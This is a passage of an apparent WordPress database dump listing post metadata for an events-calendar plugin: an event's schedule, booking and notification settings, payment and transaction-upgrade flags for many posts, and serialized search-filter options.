:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(184828,268661,'mec_certain_weekdays','a:0:{}'),(184829,268661,'mec_allday','0'),(184830,268661,'one_occurrence','0'),(184831,268661,'mec_hide_time','0'),(184832,268661,'mec_hide_end_time','0'),(184833,268661,'mec_comment',''),(184834,268661,'mec_timezone','global'),(184835,268661,'mec_countdown_method','global'),(184836,268661,'mec_public','1'),(184837,268661,'mec_start_date','2023-07-09'),(184838,268661,'mec_start_time_hour','1'),(184839,268661,'mec_start_time_minutes','0'),(184840,268661,'mec_start_time_ampm','PM'),(184841,268661,'mec_start_day_seconds','46800'),(184842,268661,'mec_end_date','2023-07-09'),(184843,268661,'mec_end_time_hour','2'),(184844,268661,'mec_end_time_minutes','30'),(184845,268661,'mec_end_time_ampm','PM'),(184846,268661,'mec_end_day_seconds','52200'),(184847,268661,'mec_repeat_status','0'),(184848,268661,'mec_repeat_type',''),(184849,268661,'mec_repeat_interval','1'),(184850,268661,'mec_repeat_end',''),(184851,268661,'mec_repeat_end_at_occurrences',''),(184852,268661,'mec_repeat_end_at_date',''),(184853,268661,'mec_advanced_days','a:0:{}'),(184854,268661,'mec_in_days',''),(184855,268661,'mec_not_in_days',''),(184856,268661,'mec_hourly_schedules','a:0:{}'),(184857,268661,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184858,268661,'mec_tickets','a:0:{}'),(184859,268661,'mec_fees_global_inheritance','1'),(184860,268661,'mec_fees','a:0:{}'),(184861,268661,'mec_ticket_variations_global_inheritance','1'),(184862,268661,'mec_ticket_variations','a:0:{}'),(184863,268661,'mec_reg_fields_global_inheritance','1'),(184864,268661,'mec_reg_fields','a:0:{}'),(184865,268661,'mec_bfixed_fields','a:0:{}'),(184866,268661,'mec_op','a:0:{}'),(184867,268661,'mec_fields','a:0:{}'),(184868,268661,'mec_event_status','EventScheduled'),(184869,268661,'mec_moved_online_link',''),(184870,268661,'mec_cancelled_reason',''),(184871,268661,'mec_display_cancellation_reason_in_single_page',''),(184872,268661,'boldgrid_hide_page_title','0'),(184873,268661,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(184874,268661,'passster_activate_global_protection',''),(184875,268661,'passster_activate_protection',''),(184876,268661,'passster_protection_type','password'),(184877,268661,'boldgrid_in_page_containers','1'),(184878,268661,'_dp_original','265240'),(184879,268661,'_edit_lock','1687289040:2'),(184880,268661,'passster_area_shortcode',''),(184881,268661,'_edit_last','2'),(184882,268661,'_wp_old_date','2023-01-14'),(184888,268618,'mec_payable','0'),(184883,268661,'_thumbnail_id','268421'),(184887,268619,'mec_payable','0'),(184886,266770,'mec_payable','0'),(184889,268617,'mec_payable','0'),(184890,268616,'mec_payable','0'),(184891,268615,'mec_payable','0'),(184892,268614,'mec_payable','0'),(184893,268605,'mec_payable','0'),(184894,268602,'mec_payable','0'),(184895,268601,'mec_payable','0'),(184896,268572,'mec_payable','0'),(184897,268532,'mec_payable','0'),(184898,268472,'mec_payable','0'),(184899,268471,'mec_payable','0'),(184900,268470,'mec_payable','0'),(184901,268469,'mec_payable','0'),(184902,268468,'mec_payable','0'),(184903,268467,'mec_payable','0'),(184904,268465,'mec_payable','0'),(184905,268463,'mec_payable','0'),(184906,268459,'mec_payable','0'),(184907,268431,'mec_payable','0'),(184908,268386,'mec_payable','0'),(184909,268385,'mec_payable','0'),(184910,268384,'mec_payable','0'),(184911,268383,'mec_payable','0'),(184912,268382,'mec_payable','0'),(184913,268378,'mec_payable','0'),(184914,268375,'mec_payable','0'),(184915,268285,'mec_payable','0'),(184916,268261,'mec_payable','0'),(184917,268191,'mec_payable','0'),(184918,268190,'mec_payable','0'),(184919,268189,'mec_payable','0'),(184920,268188,'mec_payable','0'),(184921,268187,'mec_payable','0'),(184922,268186,'mec_payable','0'),(184923,268185,'mec_payable','0'),(184924,268184,'mec_payable','0'),(184925,268183,'mec_payable','0'),(184926,268182,'mec_payable','0'),(184927,268170,'mec_payable','0'),(184928,268165,'mec_payable','0'),(184929,268164,'mec_payable','0'),(184930,268163,'mec_payable','0'),(184931,268160,'mec_payable','0'),(184932,268113,'mec_payable','0'),(184933,267956,'mec_payable','0'),(184934,267955,'mec_payable','0'),(184935,267954,'mec_payable','0'),(184936,267953,'mec_payable','0'),(184937,267942,'mec_payable','0'),(184938,267739,'mec_payable','0'),(184939,267702,'mec_payable','0'),(184940,267745,'mec_payable','0'),(184941,267743,'mec_payable','0'),(184942,267742,'mec_payable','0'),(184943,267741,'mec_payable','0'),(184944,267703,'mec_payable','0'),(184945,267616,'mec_payable','0'),(184946,267614,'mec_payable','0'),(184947,267611,'mec_payable','0'),(184948,267585,'mec_payable','0'),(184949,267584,'mec_payable','0'),(184950,267601,'mec_payable','0'),(184951,267589,'mec_payable','0'),(184952,267588,'mec_payable','0'),(184953,267587,'mec_payable','0'),(184954,267583,'mec_payable','0'),(184955,267550,'mec_payable','0'),(184956,267582,'mec_payable','0'),(184957,267564,'mec_payable','0'),(184958,267563,'mec_payable','0'),(184959,267562,'mec_payable','0'),(184960,267561,'mec_payable','0'),(184961,267560,'mec_payable','0'),(184962,267518,'mec_payable','0'),(184963,267517,'mec_payable','0'),(184964,267516,'mec_payable','0'),(184965,267451,'mec_payable','0'),(184966,267440,'mec_payable','0'),(184967,267419,'mec_payable','0'),(184968,267417,'mec_payable','0'),(184969,267415,'mec_payable','0'),(184970,267406,'mec_payable','0'),(184971,267395,'mec_payable','0'),(184972,267331,'mec_payable','0'),(184973,267330,'mec_payable','0'),(184974,267329,'mec_payable','0'),(184975,267321,'mec_payable','0'),(184976,267320,'mec_payable','0'),(184977,267260,'mec_payable','0'),(184978,267303,'mec_payable','0'),(184979,267302,'mec_payable','0'),(184980,267301,'mec_payable','0'),(184981,267300,'mec_payable','0'),(184982,267243,'mec_payable','0'),(184983,267133,'mec_payable','0'),(184984,266948,'mec_payable','0'),(184985,267228,'mec_payable','0'),(184986,267227,'mec_payable','0'),(184987,267226,'mec_payable','0'),(184988,266992,'mec_payable','0'),(184989,267195,'mec_payable','0'),(184990,267194,'mec_payable','0'),(184991,267193,'mec_payable','0'),(184992,267192,'mec_payable','0'),(184993,267191,'mec_payable','0'),(184994,267189,'mec_payable','0'),(184995,267132,'mec_payable','0'),(184996,267131,'mec_payable','0'),(184997,267087,'mec_payable','0'),(184998,267048,'mec_payable','0'),(184999,267047,'mec_payable','0'),(185000,266987,'mec_payable','0'),(185001,266887,'mec_payable','0'),(185002,266986,'mec_payable','0'),(185003,266886,'mec_payable','0'),(185004,267031,'mec_payable','0'),(185005,267030,'mec_payable','0'),(185006,267029,'mec_payable','0'),(185007,267028,'mec_payable','0'),(185008,267027,'mec_payable','0'),(185009,267026,'mec_payable','0'),(185010,267025,'mec_payable','0'),(185011,266885,'mec_payable','0'),(185012,266847,'mec_payable','0'),(185013,266848,'mec_payable','0'),(185014,266796,'mec_payable','0'),(185015,266867,'mec_payable','0'),(185016,266866,'mec_payable','0'),(185017,266865,'mec_payable','0'),(185018,266864,'mec_payable','0'),(185019,266863,'mec_payable','0'),(185020,266861,'mec_payable','0'),(185021,266860,'mec_payable','0'),(185022,266859,'mec_payable','0'),(185023,266858,'mec_payable','0'),(185024,266857,'mec_payable','0'),(185025,266856,'mec_payable','0'),(185026,266855,'mec_payable','0'),(185027,266854,'mec_payable','0'),(185028,266853,'mec_payable','0'),(185029,266852,'mec_payable','0'),(185030,266851,'mec_payable','0'),(185031,266846,'mec_payable','0'),(185032,266836,'mec_payable','0'),(185033,266834,'mec_payable','0'),(185034,266824,'mec_payable','0'),(185035,266822,'mec_payable','0'),(185036,266835,'mec_payable','0'),(185037,266817,'mec_payable','0'),(185038,266795,'mec_payable','0'),(185039,266711,'mec_payable','0'),(185040,266799,'mec_payable','0'),(185041,266794,'mec_payable','0'),(185042,266691,'mec_payable','0'),(185043,266792,'mec_payable','0'),(185044,266791,'mec_payable','0'),(185045,266790,'mec_payable','0'),(185046,266789,'mec_payable','0'),(185047,266788,'mec_payable','0'),(185048,266787,'mec_payable','0'),(185049,266786,'mec_payable','0'),(185050,266785,'mec_payable','0'),(185051,266784,'mec_payable','0'),(185052,266783,'mec_payable','0'),(185053,266782,'mec_payable','0'),(185054,266781,'mec_payable','0'),(185055,266780,'mec_payable','0'),(185056,266779,'mec_payable','0'),(185057,266778,'mec_payable','0'),(185058,266768,'mec_payable','0'),(185059,266763,'mec_payable','0'),(185060,266740,'mec_payable','0'),(185061,266686,'mec_payable','0'),(185062,266674,'mec_payable','0'),(185063,266683,'mec_payable','0'),(185064,266673,'mec_payable','0'),(185065,266670,'mec_payable','0'),(185066,266669,'mec_payable','0'),(185067,266667,'mec_payable','0'),(185068,266666,'mec_payable','0'),(185069,266665,'mec_payable','0'),(185070,266664,'mec_payable','0'),(185071,266663,'mec_payable','0'),(185072,266662,'mec_payable','0'),(185073,266661,'mec_payable','0'),(185074,266660,'mec_payable','0'),(185075,266655,'mec_payable','0'),(185076,266654,'mec_payable','0'),(185077,266644,'mec_payable','0'),(185078,266621,'mec_payable','0'),(185079,266608,'mec_payable','0'),(185080,266610,'mec_payable','0'),(185081,266607,'mec_payable','0'),(185082,266770,'mec_transaction_upgraded','yes'),(185083,268532,'mec_transaction_upgraded','yes'),(185084,268572,'mec_transaction_upgraded','yes'),(185085,268601,'mec_transaction_upgraded','yes'),(185086,268602,'mec_transaction_upgraded','yes'),(185087,268605,'mec_transaction_upgraded','yes'),(185088,268614,'mec_transaction_upgraded','yes'),(185089,268615,'mec_transaction_upgraded','yes'),(185090,268616,'mec_transaction_upgraded','yes'),(185091,268617,'mec_transaction_upgraded','yes'),(185092,268618,'mec_transaction_upgraded','yes'),(185093,268619,'mec_transaction_upgraded','yes'),(185094,268468,'mec_transaction_upgraded','yes'),(185095,268469,'mec_transaction_upgraded','yes'),(185096,268470,'mec_transaction_upgraded','yes'),(185097,268471,'mec_transaction_upgraded','yes'),(185098,268472,'mec_transaction_upgraded','yes'),(185099,268463,'mec_transaction_upgraded','yes'),(185100,268465,'mec_transaction_upgraded','yes'),(185101,268467,'mec_transaction_upgraded','yes'),(185102,268431,'mec_transaction_upgraded','yes'),(185103,268459,'mec_transaction_upgraded','yes'),(185104,268285,'mec_transaction_upgraded','yes'),(185105,268375,'mec_transaction_upgraded','yes'),(185106,268378,'mec_transaction_upgraded','yes'),(185107,268382,'mec_transaction_upgraded','yes'),(185108,268383,'mec_transaction_upgraded','yes'),(185109,268384,'mec_transaction_upgraded','yes'),(185110,268385,'mec_transaction_upgraded','yes'),(185111,268386,'mec_transaction_upgraded','yes'),(185112,268261,'mec_transaction_upgraded','yes'),(185113,268190,'mec_transaction_upgraded','yes'),(185114,268191,'mec_transaction_upgraded','yes'),(185115,268170,'mec_transaction_upgraded','yes'),(185116,268182,'mec_transaction_upgraded','yes'),(185117,268183,'mec_transaction_upgraded','yes'),(185118,268184,'mec_transaction_upgraded','yes'),(185119,268185,'mec_transaction_upgraded','yes'),(185120,268186,'mec_transaction_upgraded','yes'),(185121,268187,'mec_transaction_upgraded','yes'),(185122,268188,'mec_transaction_upgraded','yes'),(185123,268189,'mec_transaction_upgraded','yes'),(185124,268113,'mec_transaction_upgraded','yes'),(185125,268160,'mec_transaction_upgraded','yes'),(185126,268163,'mec_transaction_upgraded','yes'),(185127,268164,'mec_transaction_upgraded','yes'),(185128,268165,'mec_transaction_upgraded','yes'),(185129,267955,'mec_transaction_upgraded','yes'),(185130,267956,'mec_transaction_upgraded','yes'),(185131,267942,'mec_transaction_upgraded','yes'),(185132,267953,'mec_transaction_upgraded','yes'),(185133,267954,'mec_transaction_upgraded','yes'),(185134,267702,'mec_transaction_upgraded','yes'),(185135,267739,'mec_transaction_upgraded','yes'),(185136,267703,'mec_transaction_upgraded','yes'),(185137,267741,'mec_transaction_upgraded','yes'),(185138,267742,'mec_transaction_upgraded','yes'),(185139,267743,'mec_transaction_upgraded','yes'),(185140,267745,'mec_transaction_upgraded','yes'),(185141,267584,'mec_transaction_upgraded','yes'),(185142,267585,'mec_transaction_upgraded','yes'),(185143,267611,'mec_transaction_upgraded','yes'),(185144,267614,'mec_transaction_upgraded','yes'),(185145,267616,'mec_transaction_upgraded','yes'),(185146,267601,'mec_transaction_upgraded','yes'),(185147,267550,'mec_transaction_upgraded','yes'),(185148,267583,'mec_transaction_upgraded','yes'),(185149,267587,'mec_transaction_upgraded','yes'),(185150,267588,'mec_transaction_upgraded','yes'),(185151,267589,'mec_transaction_upgraded','yes'),(185152,267564,'mec_transaction_upgraded','yes'),(185153,267582,'mec_transaction_upgraded','yes'),(185154,267560,'mec_transaction_upgraded','yes'),(185155,267561,'mec_transaction_upgraded','yes'),(185156,267562,'mec_transaction_upgraded','yes'),(185157,267563,'mec_transaction_upgraded','yes'),(185158,267516,'mec_transaction_upgraded','yes'),(185159,267517,'mec_transaction_upgraded','yes'),(185160,267518,'mec_transaction_upgraded','yes'),(185161,267440,'mec_transaction_upgraded','yes'),(185162,267451,'mec_transaction_upgraded','yes'),(185163,267419,'mec_transaction_upgraded','yes'),(185164,267395,'mec_transaction_upgraded','yes'),(185165,267406,'mec_transaction_upgraded','yes'),(185166,267415,'mec_transaction_upgraded','yes'),(185167,267417,'mec_transaction_upgraded','yes'),(185168,267260,'mec_transaction_upgraded','yes'),(185169,267320,'mec_transaction_upgraded','yes'),(185170,267321,'mec_transaction_upgraded','yes'),(185171,267329,'mec_transaction_upgraded','yes'),(185172,267330,'mec_transaction_upgraded','yes'),(185173,267331,'mec_transaction_upgraded','yes'),(185174,267300,'mec_transaction_upgraded','yes'),(185175,267301,'mec_transaction_upgraded','yes'),(185176,267302,'mec_transaction_upgraded','yes'),(185177,267303,'mec_transaction_upgraded','yes'),(185178,267243,'mec_transaction_upgraded','yes'),(185179,266948,'mec_transaction_upgraded','yes'),(185180,267133,'mec_transaction_upgraded','yes'),(185181,266992,'mec_transaction_upgraded','yes'),(185182,267226,'mec_transaction_upgraded','yes'),(185183,267227,'mec_transaction_upgraded','yes'),(185184,267228,'mec_transaction_upgraded','yes'),(185185,267189,'mec_transaction_upgraded','yes'),(185186,267191,'mec_transaction_upgraded','yes'),(185187,267192,'mec_transaction_upgraded','yes'),(185188,267193,'mec_transaction_upgraded','yes'),(185189,267194,'mec_transaction_upgraded','yes'),(185190,267195,'mec_transaction_upgraded','yes'),(185191,267087,'mec_transaction_upgraded','yes'),(185192,267131,'mec_transaction_upgraded','yes'),(185193,267132,'mec_transaction_upgraded','yes'),(185194,266987,'mec_transaction_upgraded','yes'),(185195,267047,'mec_transaction_upgraded','yes'),(185196,267048,'mec_transaction_upgraded','yes'),(185197,266887,'mec_transaction_upgraded','yes'),(185198,266886,'mec_transaction_upgraded','yes'),(185199,266986,'mec_transaction_upgraded','yes'),(185200,267025,'mec_transaction_upgraded','yes'),(185201,267026,'mec_transaction_upgraded','yes'),(185202,267027,'mec_transaction_upgraded','yes'),(185203,267028,'mec_transaction_upgraded','yes'),(185204,267029,'mec_transaction_upgraded','yes'),(185205,267030,'mec_transaction_upgraded','yes'),(185206,267031,'mec_transaction_upgraded','yes'),(185207,266847,'mec_transaction_upgraded','yes'),(185208,266885,'mec_transaction_upgraded','yes'),(185209,266796,'mec_transaction_upgraded','yes'),(185210,266848,'mec_transaction_upgraded','yes'),(185211,266836,'mec_transaction_upgraded','yes'),(185212,266866,'mec_transaction_upgraded','yes'),(185213,266846,'mec_transaction_upgraded','yes'),(185214,266867,'mec_transaction_upgraded','yes'),(185215,266851,'mec_transaction_upgraded','yes'),(185216,266852,'mec_transaction_upgraded','yes'),(185217,266853,'mec_transaction_upgraded','yes'),(185218,266854,'mec_transaction_upgraded','yes'),(185219,266855,'mec_transaction_upgraded','yes'),(185220,266856,'mec_transaction_upgraded','yes'),(185221,266857,'mec_transaction_upgraded','yes'),(185222,266858,'mec_transaction_upgraded','yes'),(185223,266859,'mec_transaction_upgraded','yes'),(185224,266860,'mec_transaction_upgraded','yes'),(185225,266861,'mec_transaction_upgraded','yes'),(185226,266822,'mec_transaction_upgraded','yes'),(185227,266863,'mec_transaction_upgraded','yes'),(185228,266824,'mec_transaction_upgraded','yes'),(185229,266864,'mec_transaction_upgraded','yes'),(185230,266834,'mec_transaction_upgraded','yes'),(185231,266865,'mec_transaction_upgraded','yes'),(185232,266817,'mec_transaction_upgraded','yes'),(185233,266835,'mec_transaction_upgraded','yes'),(185234,266711,'mec_transaction_upgraded','yes'),(185235,266795,'mec_transaction_upgraded','yes'),(185236,266691,'mec_transaction_upgraded','yes'),(185237,266794,'mec_transaction_upgraded','yes'),(185238,266799,'mec_transaction_upgraded','yes'),(185239,266787,'mec_transaction_upgraded','yes'),(185240,266788,'mec_transaction_upgraded','yes'),(185241,266789,'mec_transaction_upgraded','yes'),(185242,266790,'mec_transaction_upgraded','yes'),(185243,266740,'mec_transaction_upgraded','yes'),(185244,266791,'mec_transaction_upgraded','yes'),(185245,266763,'mec_transaction_upgraded','yes'),(185246,266792,'mec_transaction_upgraded','yes'),(185247,266768,'mec_transaction_upgraded','yes'),(185248,266778,'mec_transaction_upgraded','yes'),(185249,266779,'mec_transaction_upgraded','yes'),(185250,266780,'mec_transaction_upgraded','yes'),(185251,266781,'mec_transaction_upgraded','yes'),(185252,266782,'mec_transaction_upgraded','yes'),(185253,266783,'mec_transaction_upgraded','yes'),(185254,266784,'mec_transaction_upgraded','yes'),(185255,266785,'mec_transaction_upgraded','yes'),(185256,266786,'mec_transaction_upgraded','yes'),(185257,266674,'mec_transaction_upgraded','yes'),(185258,266686,'mec_transaction_upgraded','yes'),(185259,266673,'mec_transaction_upgraded','yes'),(185260,266683,'mec_transaction_upgraded','yes'),(185261,266608,'mec_transaction_upgraded','yes'),(185262,266621,'mec_transaction_upgraded','yes'),(185263,266644,'mec_transaction_upgraded','yes'),(185264,266654,'mec_transaction_upgraded','yes'),(185265,266655,'mec_transaction_upgraded','yes'),(185266,266660,'mec_transaction_upgraded','yes'),(185267,266661,'mec_transaction_upgraded','yes'),(185268,266662,'mec_transaction_upgraded','yes'),(185269,266663,'mec_transaction_upgraded','yes'),(185270,266664,'mec_transaction_upgraded','yes'),(185271,266665,'mec_transaction_upgraded','yes'),(185272,266666,'mec_transaction_upgraded','yes'),(185273,266667,'mec_transaction_upgraded','yes'),(185274,266669,'mec_transaction_upgraded','yes'),(185275,266670,'mec_transaction_upgraded','yes'),(185276,266610,'mec_transaction_upgraded','yes'),(185277,266607,'mec_transaction_upgraded','yes'),(193310,269169,'mec_payable','0'),(185284,268667,'_edit_lock','1700514749:2'),(185285,268667,'_edit_last','2'),(185286,268667,'label',''),(185287,268667,'category','110,113,114,116'),(185288,268667,'ex_category',''),(185289,268667,'location',''),(185290,268667,'ex_location',''),(185291,268667,'organizer',''),(185292,268667,'ex_organizer',''),(185293,268667,'sponsor',''),(185294,268667,'tag',''),(185295,268667,'author',''),(185296,268667,'sf_status','1'),(185297,268667,'sf_display_label','0'),(185298,268667,'sf_reset_button','0'),(185299,268667,'sf_refine','0'),(185300,268667,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"m